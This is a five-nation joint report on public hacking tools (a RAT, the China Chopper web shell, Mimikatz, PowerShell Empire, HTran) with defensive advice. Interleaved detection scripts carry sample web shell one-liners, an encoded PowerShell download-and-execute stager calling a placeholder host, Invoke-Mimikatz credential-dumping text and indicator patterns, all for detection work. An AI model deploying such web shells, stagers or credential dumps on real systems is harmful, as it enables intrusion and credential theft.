Joint report on publicly available hacking tools


Limiting the effectiveness of tools commonly used by malicious actors

Introduction

This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the UK and USA [Footnote 1].

In it we highlight the use of five publicly-available tools, which have been used for malicious purposes in recent cyber incidents around the world.

To aid the work of network defenders and systems administrators, we also provide advice on limiting the effectiveness of these tools and detecting their use on a network.


Nature of the tools

The individual tools we cover in this report are limited examples of the types used by malicious actors. You should not consider it an exhaustive list when planning your network defence.

Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states, or criminals on the Dark Web. Today, hacking tools with a variety of functions are widely and freely available, for use by everyone from skilled penetration testers, hostile state actors and organised criminals, through to amateur hackers.

These tools have been used to compromise information across a wide range of critical sectors, including health, finance, government and defence. Their widespread availability presents a challenge for network defence and actor attribution.

Experience from all our countries makes it clear that, while cyber actors continue to develop their capabilities, they still make use of established tools and techniques. Even the most sophisticated groups use common, publicly-available tools to achieve their objectives.

Whatever these objectives may be, initial compromises of victim systems are often established through exploitation of common security weaknesses. Exploitation of unpatched software vulnerabilities or poorly configured systems is a common way for an actor to gain access. The tools detailed here come into play once a compromise has been achieved, enabling attackers to further their objectives within the victim's systems.

Report structure

The tools detailed fall into five categories: Remote Access Trojans (RATs), Web Shells, Credential Stealers, Lateral Movement Frameworks, and Command and Control (C2) Obfuscators.

The report provides an overview of the threat posed by each tool, along with insight into where and when it has been deployed by hostile actors. Measures to aid detection and limit the effectiveness of each tool are also described.

The report concludes with general advice for improving network defence practices.

 

Remote access trojans: JBiFrost

First observed in May 2015, the JBiFrost Remote Access Trojan (RAT) is a variant of the Adwind RAT, with roots stretching back to the Frutas RAT, from 2012.

A RAT is a programme which, once installed on a victim’s machine, allows remote administrative control. In a malicious context it can, among many other functions, be used to install backdoors and key loggers, take screen shots, and exfiltrate data.

Malicious RATs can be difficult to detect because they are normally designed not to appear in lists of running programmes and can mimic the behaviour of legitimate applications.

To prevent forensic analysis, RATs have been known to disable security measures, such as Task Manager, and network analysis tools, such as Wireshark, on the victim's system.

In use

JBiFrost is typically employed by cyber criminals and low-skilled actors, but its capabilities could easily be adapted for use by state actors.

Other RATs are widely used by Advanced Persistent Threat (APT) groups, such as Adwind against the aerospace and defence sector, or Quasar RAT by APT10, against a broad range of sectors.

Malicious actors have also compromised servers with the purpose of delivering malicious RATs to victims, either to gain remote access for further exploitation, or to steal valuable information, such as banking credentials, Intellectual Property or PII.

Capabilities

The JBiFrost RAT is Java-based, cross-platform and multifunctional. It poses a threat to several different operating systems, including Windows, Linux, Mac OS X and Android.

JBiFrost allows actors to pivot and move laterally across a network, or install additional malicious software. It is primarily delivered through emails as an attachment: usually an invoice notice; request for quotation; remittance notice; shipment notification; payment notice; or with a link to a file hosting service.

Past infections have exfiltrated intellectual property, banking credentials and Personally Identifiable Information (PII). Machines infected with JBiFrost can also be used in botnets to carry out Distributed Denial of Service (DDoS) attacks.

Examples

Since early 2018, we have observed an increase in JBiFrost being used in targeted attacks against critical national infrastructure owners and their supply chain operators. There has also been an increase in the RAT’s hosting on infrastructure located in our countries.

In early 2017, the Adwind RAT was deployed via spoofed emails, designed to look as if they originated from SWIFT network services.

Many other publicly available RATs, including variations of the Gh0st RAT, have also been observed in use against a range of victims worldwide.

Detection and protection

Some possible indications of a JBiFrost RAT infection can include, but are not limited to:

  • Inability to restart the computer in safe mode;
  • Inability to open the Windows registry editor or task manager;
  • Significant increase in disk activity and/or network traffic;
  • Connection attempts to known malicious IP addresses; and
  • Creation of new files and directories with obfuscated or random names.

Protection is best afforded by ensuring systems and installed applications are all fully patched and updated. The use of a modern antivirus program with automatic definition updates and regular system scans will also help ensure that most of the latest variants are stopped in their tracks. You should ensure that your organisation is able to collect antivirus detections centrally across its estate and investigate RAT detections efficiently.

Strict application whitelisting is recommended to prevent infections occurring.

The initial infection mechanism for RATs, including JBiFrost, can be via phishing emails. You can help prevent JBiFrost infections by stopping these phishing emails from reaching your users, helping users to identify and report phishing emails, and implementing security controls so that the malicious email doesn't compromise your devices. For further details, see the NCSC's phishing guidance [Footnote 2].

 

Web shells: China Chopper

China Chopper is a publicly available, well-documented web shell, in widespread use since 2012.

Web shells are malicious scripts which are uploaded to a target host after an initial compromise and grant an actor remote administrative capability.

Once this access is established, web shells can also be used to pivot to further hosts within a network.

In use

The China Chopper web shell is extensively used by hostile actors to remotely access compromised web-servers, where it provides file and directory management, along with access to a virtual terminal on the compromised device.

As China Chopper is only about 4 KB in size and has an easily modified payload, detection and mitigation are difficult for network defenders.

Capabilities

The China Chopper web shell has two main components: the China Chopper client, which is run by the attacker, and the China Chopper server, which is installed on the victim web server but is also attacker-controlled.

The web shell client can issue terminal commands and manage files on the victim server. Its MD5 hash is publicly available [Footnote 3].

Web shell client    MD5 hash
caidao.exe          5001ef50c7e869253a7c152a638eab8a

The web shell server is uploaded in plain text and can easily be changed by the attacker. This makes it hard to define a specific hash that can identify adversary activity.

In summer 2018, threat actors were observed targeting public-facing web servers vulnerable to CVE-2017-3066, a remote code execution vulnerability in the Adobe ColdFusion web application development platform. China Chopper was intended as the second-stage payload, delivered once servers had been compromised, giving the attacker remote access to the victim host.

After successful exploitation of a vulnerability on the victim machine, the text-based China Chopper is placed on the victim web server. Once uploaded, the web shell server can be accessed by the attacker at any time, using the client application. Once successfully connected, the attacker proceeds to manipulate files and data on the web server.

Capabilities include uploading and downloading files to and from the victim, using the file-retrieval tool 'wget' to download files from the internet to the target, and editing, deleting, copying, renaming, and even changing the timestamp of existing files.

Detection and protection

The most powerful defence against a web shell is to avoid the web server being compromised in the first place. Ensure that all the software running on public facing web servers is up to date, with security patches applied. Audit custom applications for common web vulnerabilities [Footnote 4].

One attribute of China Chopper is that every action generates an HTTP POST. A script that receives a stream of POST requests, often from a single client address and with no corresponding GET requests, stands out in web access logs if a network defender looks for it.

While the China Chopper web shell server is uploaded in plain text, the commands issued by the client are Base64 encoded. Base64 is an encoding, not encryption, and the commands are trivially decoded once captured.

The adoption of Transport Layer Security (TLS) by web servers has resulted in web server traffic becoming encrypted, making detection of China Chopper activity using network-based tools more challenging.

The most effective way to detect and mitigate China Chopper is on the host itself (specifically on public-facing web servers). There are simple ways to search for the presence of the web shell using the command line on both Linux and Windows based operating systems [Footnote 5].
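The following Python script is an added illustration of the three detection points above (POST-only traffic to a single script, Base64-encoded client commands, and a host-side search for the server half of the shell). It is not part of this report or of any tool the report describes. The log lines, POST body and file contents are constructed for the example; the request format it decodes (a password parameter that calls eval on a Base64-decoded z0 parameter) follows the commonly documented PHP variant of China Chopper and is an assumption, as are the file patterns.

```python
import base64
import os
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlencode

# "combined" access-log line: ip ident user [time] "METHOD path HTTP/x" status size "referer" "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3}) ')

# Server half of the shell: a request parameter handed straight to eval().
# Assumed forms:  PHP  <?php @eval($_POST['password']);?>   ASP  <%eval request("pass")%>
SHELL_RE = re.compile(
    rb"eval\s*\(\s*(?:base64_decode\s*\()?\s*\$_(?:POST|GET|REQUEST)\b"
    rb"|eval\s*\(?\s*Request\s*(?:\.Item)?\s*[\[(]",
    re.IGNORECASE,
)


def post_only_paths(log_lines, min_posts=3):
    """Paths that receive POSTs (at least min_posts) but never a GET, with the
    client IPs that POSTed to them. Ordinary pages are fetched with GET first."""
    methods = defaultdict(lambda: defaultdict(int))   # path -> method -> count
    clients = defaultdict(set)                        # path -> POSTing client IPs
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                  # not a line we understand
        ip, method, path, _status = m.groups()
        path = path.split("?", 1)[0]
        methods[path][method] += 1
        if method == "POST":
            clients[path].add(ip)
    return {p: clients[p] for p, c in methods.items()
            if c["POST"] >= min_posts and c["GET"] == 0}


def decode_chopper_body(body):
    """Base64-decode every parameter of a captured POST body that decodes to
    readable text; with China Chopper that is the command the operator ran."""
    decoded = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            try:
                raw = base64.b64decode(value, validate=True)
            except ValueError:                        # binascii.Error is a ValueError
                continue
            readable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw)
            if raw and readable / len(raw) >= 0.9:
                decoded[name] = raw.decode("utf-8", errors="replace")
    return decoded


def scan_contents(files):
    """files: {path: bytes}. Paths whose content matches a web shell pattern."""
    return sorted(path for path, data in files.items() if SHELL_RE.search(data))


def scan_webroot(root):
    """Apply the same patterns to the script files under a real web root."""
    files = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith((".php", ".phtml", ".asp", ".aspx", ".jsp")):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    files[full] = fh.read()
    return scan_contents(files)


# --- constructed sample data (not captured from any real incident) ---
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Sep/2018:10:01:02 +0000] "POST /uploads/img.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [12/Sep/2018:10:01:09 +0000] "POST /uploads/img.php HTTP/1.1" 200 77 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [12/Sep/2018:10:02:41 +0000] "POST /uploads/img.php HTTP/1.1" 200 1803 "-" "Mozilla/4.0"',
    '198.51.100.5 - - [12/Sep/2018:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 4221 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [12/Sep/2018:10:03:20 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Sep/2018:10:04:00 +0000] "GET /login.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]
SAMPLE_COMMAND = '@ini_set("display_errors","0");@set_time_limit(0);echo shell_exec("id");'
SAMPLE_BODY = urlencode({
    "password": "@eval(base64_decode($_POST[z0]));",   # the shell's own parameter name
    "z0": base64.b64encode(SAMPLE_COMMAND.encode()).decode(),
})
SAMPLE_FILES = {
    "/var/www/html/index.php": b"<?php require 'app/bootstrap.php'; run(); ?>",
    "/var/www/html/uploads/img.php": b"<?php @eval($_POST['password']);?>",
    "/var/www/html/admin/cmd.asp": b'<%eval request("pass")%>',
}

if __name__ == "__main__":
    print(post_only_paths(SAMPLE_LOG))
    print(decode_chopper_body(SAMPLE_BODY))
    print(scan_contents(SAMPLE_FILES))
```

The log check is a triage filter, not a verdict: an API endpoint or form handler can legitimately be POST-only, so the candidate paths should be checked on disk with scan_webroot and against the server's deployment records. Because the server half is so short and easily edited, the file patterns will miss a shell the attacker has reworded; treat a miss as absence of evidence only.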

To detect web shells more broadly, network defenders should focus on spotting either suspicious process execution on web servers (for example the PHP interpreter spawning a shell or other child processes), or out of pattern outbound network connections from web servers. Typically, web servers make predictable connections to an internal network. Changes in those patterns may indicate the presence of a web shell. You can also set file-system permissions so that the web-server process cannot write to directories from which PHP can be executed, or modify existing files.

We also recommend that you use web access logs as a source of monitoring, for example through traffic analytics. Observing new unexpected pages or changes in traffic patterns can act as an early indicator.

 

Credential stealers: Mimikatz

Developed in 2007, Mimikatz is mainly used by attackers to collect the credentials of other users logged in to a targeted Windows machine. It does this by accessing the credentials in memory, within a Windows process called Local Security Authority Subsystem Service (LSASS).

These credentials, either plain text, or in hashed form, can be reused to give access to other machines on a network.

Although it was not originally intended as a hacking tool, in recent years Mimikatz has been used by multiple actors for malicious purposes. Its use in compromises around the world has prompted organisations globally to re-evaluate their network defences.

Mimikatz is typically used by malicious actors once access has been gained to a host and the actor wishes to move throughout the internal network. Its use can significantly undermine poorly configured network security.

In use

Mimikatz source code is publicly available, which means anyone can compile their own versions of the tool and potentially develop new custom plug-ins and additional functionality.

Our cyber authorities have observed widespread use of Mimikatz among hostile actors, including organised crime and state-sponsored groups.

Once a malicious actor has gained local admin privileges on a host, Mimikatz provides the ability to obtain the hashes and clear-text credentials of other users, enabling the actor to escalate privileges within a domain and perform many other post-exploitation and lateral movement tasks.

For this reason, Mimikatz has been bundled into other penetration testing and exploitation suites, such as PowerShell Empire and Metasploit.

Capabilities

Mimikatz is best known for its ability to retrieve clear text credentials and hashes from memory, but its full suite of capabilities is extensive.

The tool can obtain LAN Manager and NTLM hashes, certificates and long-term keys on Windows XP and Server 2003 through to Windows 8.1 and Server 2012 R2. In addition, it can perform pass-the-hash or pass-the-ticket attacks and build Kerberos Golden Tickets.

Many features of Mimikatz can be automated with scripts, such as PowerShell, allowing an actor to rapidly exploit and traverse a compromised network. Furthermore, when operating in memory through the freely available, yet powerful, 'Invoke-Mimikatz' PowerShell script, Mimikatz activity is very difficult to isolate and identify.

Examples

Mimikatz has been used across multiple incidents by a broad range of actors for several years. In 2011 it was used by unknown hackers to obtain administrator credentials from the Dutch certificate authority, DigiNotar. The rapid loss of trust in DigiNotar led to the company filing for bankruptcy within a month of this compromise.

More recently, Mimikatz was used in conjunction with other hacking tools in the 2017 NotPetya and BadRabbit ransomware attacks to extract administrator credentials held on thousands of computers. These credentials were used to facilitate lateral movement and enabled the ransomware to propagate throughout networks, encrypting the hard drives of numerous systems where these credentials were valid.

In addition, a Microsoft research team identified use of the tool during a sophisticated cyber-attack targeting several high-profile technology and financial organisations. In combination with several other tools and exploited vulnerabilities, Mimikatz was used to dump and likely reuse system hashes.

Detection and protection

Updating Windows will help reduce the information available to an actor from the Mimikatz tool, as Microsoft seeks to improve the protection offered in each new Windows version.

To prevent Mimikatz credential retrieval, defenders should disable the storage of clear-text passwords in LSASS memory. This is the default behaviour for Windows 8.1/Server 2012 R2 and later, and can be enforced on older systems that have the relevant security patches installed by setting the WDigest UseLogonCredential registry value to 0 [Footnote 6]. Windows 10 and Windows Server 2016 systems can be further protected using newer security features such as Credential Guard.

Credential Guard will be enabled by default if:

  • The hardware meets Microsoft's Windows Hardware Compatibility Programme specifications and policies for Windows Server 2016 and Windows Server Semi-Annual Branch; and
  • The server is not acting as a Domain Controller.

You should verify that your physical and virtualised servers meet Microsoft's minimum requirements for each release of Windows 10 and Windows Server [Footnote 7].

Password reuse across accounts, particularly administrator accounts, makes pass-the-hash attacks far simpler, because the hash of a reused password is valid wherever that password is set. You should set user policies within your organisation that discourage password reuse, even across standard user accounts on a network.

The freely available Local Administrator Password Solution (LAPS) from Microsoft sets a unique, randomly generated local administrator password on each domain-joined machine and stores it in Active Directory. This removes the need to set and store those passwords manually, and means that a local administrator hash captured on one machine is not valid on another.

Network administrators should monitor and respond to unusual or unauthorised account creation or authentication, to prevent Golden Ticket exploitation or network persistence and lateral movement. For Windows, tools such as Microsoft ATA and Azure ATP can help with this.

Network administrators should ensure that systems are patched and up to date. Numerous Mimikatz features are mitigated, or significantly restricted, by the latest system versions and updates. But no update is a perfect fix, as Mimikatz is continually evolving and new third party modules are often developed.

Most up-to-date antivirus tools will detect and isolate non-customised Mimikatz use and should therefore be in use to detect these instances. But hostile actors can sometimes circumvent antivirus systems by running the tool in memory, or by slightly modifying the original code of the tool. Wherever Mimikatz is detected, you should perform a rigorous investigation, as it almost certainly indicates an actor actively present in the network, rather than an automated process at work.

Several features of Mimikatz rely on the abuse of administrator accounts. Therefore, you should ensure that administrator accounts are issued on an as-required basis only. Where administrative access is required, you should apply Privileged Access Management principles.

Since Mimikatz can only capture the credentials of accounts that have logged on to a compromised machine, privileged users (such as domain admins) should avoid logging on to machines with their privileged credentials. Detailed information on securing Active Directory is available from Microsoft [Footnote 8].

Network defenders should audit the use of scripts, particularly PowerShell, and inspect logs to identify anomalies. This will aid identification of Mimikatz or pass-the-hash abuse, as well as providing some mitigation against attempts to bypass detection software.

 

Lateral movement frameworks: PowerShell Empire

PowerShell Empire is an example of a post exploitation or lateral movement tool. It is designed to allow an attacker (or penetration tester) to move around a network after gaining initial access. Other examples of these tools include Cobalt Strike and Metasploit. Empire can also be used to generate malicious documents and executables for social engineering access to networks.

The PowerShell Empire framework (Empire) was designed as a legitimate penetration testing tool in 2015. Empire acts as a framework for continued exploitation once an attacker has gained access to a system.

The tool provides an attacker with the ability to escalate privileges, harvest credentials, exfiltrate information and move laterally across a network. These capabilities make it a powerful exploitation tool. Because it is built on a common, legitimate application (PowerShell) and can operate almost entirely in memory, Empire can be difficult to detect on a network using traditional antivirus tools.

In use

PowerShell Empire has become increasingly popular among hostile state actors and organised criminals. In recent years we have seen it used in cyber incidents globally across a wide range of sectors.

Initial exploitation methods vary between compromises, and actors can configure the Empire Framework uniquely for each scenario and target.

This, in combination with the wide range of skill and intent within the Empire user community, means that ease of detection will vary. Nonetheless, having a greater understanding and awareness of this tool is a step forward in defending against its use by malicious actors.

Capabilities

Empire enables an attacker to carry out a range of actions on a victim’s machine and implements the ability to run PowerShell scripts without needing ‘powershell.exe’ to be present on the system. Its communications are encrypted and its architecture flexible.

Empire uses ‘modules’ to perform more specific, malicious actions. These provide attackers with a customisable range of options to pursue their goals on the victim's systems. These include escalation of privileges, credential harvesting, host enumeration, key-logging and the ability to move laterally across a network.

Empire’s ease of use, flexible configuration and ability to evade detection make it a popular choice for actors of varying abilities.

Examples

During an incident in February 2018, a UK energy sector company was compromised by an unknown actor. This compromise was detected through Empire’s beaconing activity, using the tool's default profile settings. Weak credentials on one of the victim’s administrator accounts are believed to have provided the actor with initial access to the network.

In early 2018, an unknown actor used Winter Olympics themed socially engineered emails and malicious attachments in a spear phishing campaign targeting several South Korean organisations. This attack had an additional layer of sophistication, making use of Invoke-PSImage, a tool that will encode any PowerShell script into an image.

In December 2017, the hostile actor APT19 targeted a multinational law firm with a targeted phishing campaign. APT19 used obfuscated PowerShell macros embedded within Word documents generated by Empire.

Our cyber security authorities are also aware of Empire being used to target academia. In one reported instance, an actor attempted to use Empire to gain persistence using a Windows Management Instrumentation (WMI) event consumer. However, in this instance the Empire agent was unsuccessful in establishing network connections due to the HTTP connections being blocked by a local security appliance.

Detection and protection

Identifying malicious PowerShell activity can be difficult, due to the prevalence of legitimate PowerShell on hosts and its increased use in maintaining a corporate environment.

To identify potentially malicious scripts, PowerShell activity should be comprehensively logged. This should include script block logging and PowerShell transcripts.
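The script below is an added example, not from the report or from Empire, of the log review recommended here and in the Mimikatz section above. It takes process-creation (Event ID 4688, CommandLine) and script block logging (Event ID 4104, ScriptBlockText) records, decodes any -EncodedCommand payload (Base64 of UTF-16LE text), and flags Invoke-Mimikatz and Mimikatz module names, download-and-execute patterns, the hidden/non-interactive launch flags, and attempts to start PowerShell version 2. The records, including the stager string and its URL, are constructed and are not real indicators; the indicator list is a starting point for an analyst, not a complete signature set.

```python
import base64
import re

# Text a defender does not expect in legitimate automation, keyed by what it suggests.
INDICATORS = {
    "mimikatz": re.compile(
        r"invoke-mimikatz|sekurlsa::|lsadump::|kerberos::golden|privilege::debug", re.I),
    "download_exec": re.compile(                      # fetch code, run it in memory
        r"(?:net\.webclient|downloadstring|invoke-webrequest)[\s\S]*?\b(?:iex|invoke-expression)\b"
        r"|\b(?:iex|invoke-expression)\b[\s\S]*?(?:net\.webclient|downloadstring)", re.I),
    "hidden_noninteractive": re.compile(              # typical launcher flags
        r"-(?:w|windowstyle)\s+hidden[\s\S]*-(?:noni|noninteractive)"
        r"|-(?:noni|noninteractive)[\s\S]*-(?:w|windowstyle)\s+hidden", re.I),
    "version_downgrade": re.compile(r"-(?:v|version)\s+2\b", re.I),   # sidestep v5 logging
}
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """The -EncodedCommand payload as text (Base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """events: dicts with RecordId plus CommandLine (4688) or ScriptBlockText (4104).
    Returns [(RecordId, [indicator, ...])] for records worth an analyst's attention."""
    findings = []
    for ev in events:
        text = ev.get("CommandLine") or ev.get("ScriptBlockText") or ""
        decoded = decode_encoded_command(text)
        if decoded:
            text = text + "\n" + decoded              # inspect the launcher and its payload
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if decoded:
            hits.append("encoded_command")
        if hits:
            findings.append((ev["RecordId"], hits))
    return findings


# --- constructed sample records (shape only; nothing here is from a real incident) ---
STAGER = ("$wc=New-Object System.Net.WebClient;$wc.Headers.Add('User-Agent','Mozilla/5.0');"
          "IEX $wc.DownloadString('http://203.0.113.10:8080/index.asp')")
LAUNCHER = ("powershell.exe -NoP -sta -NonI -W Hidden -Enc "
            + base64.b64encode(STAGER.encode("utf-16-le")).decode())
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventId": 4688,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"RecordId": 2, "EventId": 4688, "CommandLine": LAUNCHER},
    {"RecordId": 3, "EventId": 4104, "ScriptBlockText":
        'function Invoke-Mimikatz {\n  Param([String]$Command = "sekurlsa::logonpasswords exit")'
        '\n  ...\n}\nInvoke-Mimikatz -DumpCreds'},
    {"RecordId": 4, "EventId": 4688,
     "CommandLine": r"powershell.exe -Version 2 -NoProfile -File C:\Temp\run.ps1"},
    {"RecordId": 5, "EventId": 4104, "ScriptBlockText": "Get-ChildItem -Path C:\\Logs -Filter *.log"},
]

if __name__ == "__main__":
    for record_id, hits in triage(SAMPLE_EVENTS):
        print(record_id, hits)
```

Record 2 is the interesting case: nothing in the launcher's visible command line names a tool, and it is only after decoding the -EncodedCommand payload that the download-and-execute pattern appears. Script block logging (4104) closes the gap from the other side, since it records the script as PowerShell actually compiled it, after any encoding or string assembly; the 4688 command line alone would not have shown the Invoke-Mimikatz call in record 3.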

Older versions of PowerShell should be removed from environments to ensure that they cannot be used to circumvent additional logging and controls added in more recent versions of PowerShell. The Digital Shadows blog [Footnote 9] provides a good summary of PowerShell security practices.

The code integrity features in recent versions of Windows can be used to limit the functionality of PowerShell, preventing or hampering malicious PowerShell in the event of a successful intrusion.

A combination of script code signing, application whitelisting and constrained language mode will prevent or limit the effect of malicious PowerShell in the event of a successful intrusion. These controls will also impact legitimate scripts and it is strongly advised that they be thoroughly tested before deployment.

When organisations profile their PowerShell usage, they often find it is only used legitimately by a small number of technical staff. Establishing the extent of this legitimate activity will make it easier to monitor and investigate suspicious or unexpected PowerShell usage elsewhere on the network.

C2 obfuscation tools: HTran

Attackers will often want to disguise their location when compromising a target. To do this, they may use generic privacy tools such as Tor, or more specific tools to obfuscate their location.

HUC Packet Transmitter (HTran) is a proxy tool, used to intercept and redirect Transmission Control Protocol (TCP) connections from the local host to a remote host. This makes it possible to obfuscate an attacker's communications with victim networks. The tool has been freely available on the internet since at least 2009.

HTran facilitates TCP connections between the victim and a hop point controlled by an attacker. Malicious cyber actors can use this technique to redirect their packets through multiple compromised hosts running HTran, to gain greater access to hosts in a network.

In use

The use of HTran has been regularly observed in compromises of both government and industry targets.

A broad range of cyber actors have been observed using HTran and other connection proxy tools to:

  • Evade intrusion and detection systems on a network;
  • Blend in with common traffic or leverage domain trust relationships to bypass security controls;
  • Obfuscate or hide C2 infrastructure or communications; and
  • Create peer-to-peer or meshed C2 infrastructure to evade detection and provide resilient connections to infrastructure.

Capabilities

HTran can run in several modes, each of which forwards traffic across a network by bridging two TCP sockets. They differ in terms of where the TCP sockets are initiated from, either locally or remotely. The three modes are:

  • Server (listen) – Both TCP sockets initiated remotely;
  • Client (slave) – Both TCP sockets initiated locally; and
  • Proxy (tran) – One TCP socket initiated remotely, the other initiated locally, upon receipt of traffic from the first connection.

HTran can inject itself into running processes and install a rootkit to hide network connections from the host operating system. Using these features also creates Windows registry entries to ensure that HTran maintains persistent access to the victim network.

Examples

Recent investigations by our cyber security authorities have identified the use of HTran to maintain and obfuscate remote access to targeted environments.

In one incident, the attacker compromised externally facing web servers running outdated and vulnerable web applications. This access enabled the upload of web shells, which were then used to deploy other tools, including HTran.

HTran was installed into the ProgramData directory and other deployed tools were used to reconfigure the server to accept Remote Desktop Protocol (RDP) communications.

The actor issued a command to start HTran as a client, initiating a connection to a server located on the internet over port 80, which forwards RDP traffic from the local interface.

In this case, HTTP was chosen to blend in with other traffic that was expected to be seen originating from a web server to the internet. Other well-known ports used included:

  • Port 53 - DNS;
  • Port 443 - HTTP over TLS/SSL; and
  • Port 3306 - MySQL

By using HTran in this way, the actor was able to use RDP for several months without being detected.

Detection and protection

Attackers need access to a machine to install and run HTran, so network defenders should apply security patches and use good access control to prevent attackers installing malicious applications.

Network monitoring [Footnote 10] and firewalls can help prevent and detect unauthorised connections from tools such as HTran.

In some of the samples analysed, the rootkit component of HTran only hides connection details when the proxy mode is used. When client mode is used, defenders can view details about the TCP connections being made.

HTran also includes a debugging condition that is useful for network defenders. In the event that a destination becomes unavailable, HTran generates an error message using the following format:

sprintf(buffer, "[SERVER]connection to %s:%d error\r\n", host, port2);

This error message is relayed to the connecting client in the clear. Defenders can monitor for this error message to potentially detect HTran instances active in their environments.
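As an added example, not from the report, the script below applies two network-side checks to reassembled TCP payloads: the HTran error message quoted above, and RDP appearing on the non-RDP ports listed earlier. The first packet of an RDP session is a TPKT header (bytes 03 00 followed by a 16-bit length) wrapping an X.224 Connection Request (code 0xE0), which the Windows client normally prefixes with a "Cookie: mstshash=" line; that framing is what the check looks for. The flows, addresses and usernames are constructed.

```python
import re

# The clear-text diagnostic HTran relays when its onward hop cannot be reached.
HTRAN_ERR_RE = re.compile(rb"\[SERVER\]connection to (\S+):(\d+) error\r\n")
RDP_PORTS = {3389}


def htran_error(payload):
    """(host, port) named in an HTran error message found in the payload, or None."""
    m = HTRAN_ERR_RE.search(payload)
    return (m.group(1).decode(), int(m.group(2))) if m else None


def looks_like_rdp(payload):
    """True if the payload opens with a TPKT header (03 00 + 16-bit big-endian length)
    carrying an X.224 Connection Request (code 0xE0), i.e. the first RDP packet."""
    if len(payload) < 11 or payload[0] != 0x03 or payload[1] != 0x00:
        return False
    tpkt_len = int.from_bytes(payload[2:4], "big")
    return 11 <= tpkt_len <= len(payload) and payload[5] == 0xE0


def inspect_flows(flows):
    """flows: dicts with dport and the first application bytes seen on the connection.
    Flags RDP on a port where RDP is not expected, and any HTran error message."""
    findings = []
    for i, flow in enumerate(flows):
        if looks_like_rdp(flow["payload"]) and flow["dport"] not in RDP_PORTS:
            findings.append((i, "rdp_on_port_%d" % flow["dport"]))
        err = htran_error(flow["payload"])
        if err:
            findings.append((i, "htran_error_to_%s:%d" % err))
    return findings


def make_rdp_connection_request(user):
    """Minimal TPKT + X.224 Connection Request with the mstshash cookie the
    Windows client sends; used only to build the constructed sample below."""
    cookie = b"Cookie: mstshash=" + user.encode() + b"\r\n"
    x224 = bytes([0xE0, 0x00, 0x00, 0x00, 0x00, 0x00]) + cookie   # CR, DST-REF, SRC-REF, class
    x224 = bytes([len(x224)]) + x224                               # length indicator
    return b"\x03\x00" + (4 + len(x224)).to_bytes(2, "big") + x224


# --- constructed flows standing in for reassembled TCP payloads ---
SAMPLE_FLOWS = [
    {"src": "10.0.0.12", "dst": "198.51.100.20", "dport": 80,
     "payload": make_rdp_connection_request("admin")},          # RDP where HTTP should be
    {"src": "10.0.0.12", "dst": "198.51.100.20", "dport": 80,
     "payload": b"GET / HTTP/1.1\r\nHost: example.org\r\n\r\n"},
    {"src": "10.0.0.12", "dst": "198.51.100.20", "dport": 80,
     "payload": b"[SERVER]connection to 10.0.0.30:3389 error\r\n"},   # HTran diagnostic
    {"src": "10.0.0.40", "dst": "10.0.0.30", "dport": 3389,
     "payload": make_rdp_connection_request("helpdesk")},       # RDP on its own port
]

if __name__ == "__main__":
    for index, finding in inspect_flows(SAMPLE_FLOWS):
        print(index, finding)
```

The port-mismatch check is the more durable of the two, because it does not depend on HTran at all: any relay that carries RDP over 80, 443, 53 or 3306 to blend in will trip it. The error-string check is cheap and specific, but it only fires when the onward hop fails, and a recompiled HTran may not carry the string. Both checks assume clear-text payloads, so they stop working once the actor wraps the tunnel in TLS; at that point the remaining signal is the unusual connection pattern itself (a web server making a long-lived outbound connection on port 80 or 443).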

 

General detection and prevention measures

There are several measures that will improve the overall cyber security of your organisation and help protect it against the types of tools highlighted by this report. Network defenders are advised to seek further information using the links below.

CCCS Top 10 Security Actions

CCCS Cyber hygiene

Cyber Security Concerns for Management:
Cyber security considerations for management - Guidance for the Government of Canada (ITSB-67)

Use multi-factor authentication (also known as two-factor or two-step authentication) to reduce the impact of password compromises. See CCCS guidance: User authentication guidance for information technology systems (ITSP.30.031 v3)

Protect your devices and networks by keeping them up to date: use the latest supported versions, apply security patches promptly, use antivirus and scan regularly to guard against known malware threats. See CCCS Guidance: Security vulnerabilities and patches explained - IT security bulletin for the Government of Canada (ITSB-96)

Network security zoning - Design considerations for placement of services within zones (ITSG-38).

Protect the management interfaces of your critical operational systems. In particular, use browse-down architecture to prevent attackers easily gaining privileged access to your most vital assets.

Set up a security monitoring capability so you are collecting the data that will be needed to analyse network intrusions.

Update your systems and software. Ensure your operating system and productivity apps are up to date. Users with Office 365 licensing can use 'click to run' to keep their office applications seamlessly updated.

Use modern systems and software. These have better security built-in.

Restrict intruders' ability to move freely around your systems and networks. Pay particular attention to potentially vulnerable entry points eg third-party systems with onward access to your core network. During an incident, disable remote access from third-party systems until you are sure they are clean. See CCCS Guidance: Cyber Security Best Practices: Contracting With Managed Service Providers

Whitelist applications. If supported by your operating environment, consider whitelisting of permitted applications. This will help prevent malicious applications from running. See CCCS Guidance: Cyber Security Best Practices: Contracting With Managed Service Providers

Manage macros carefully: disable Office macros except in the specific apps where they are required, only enable macros for users that need them day-to-day, use a recent and fully patched version of Office and the underlying platform.

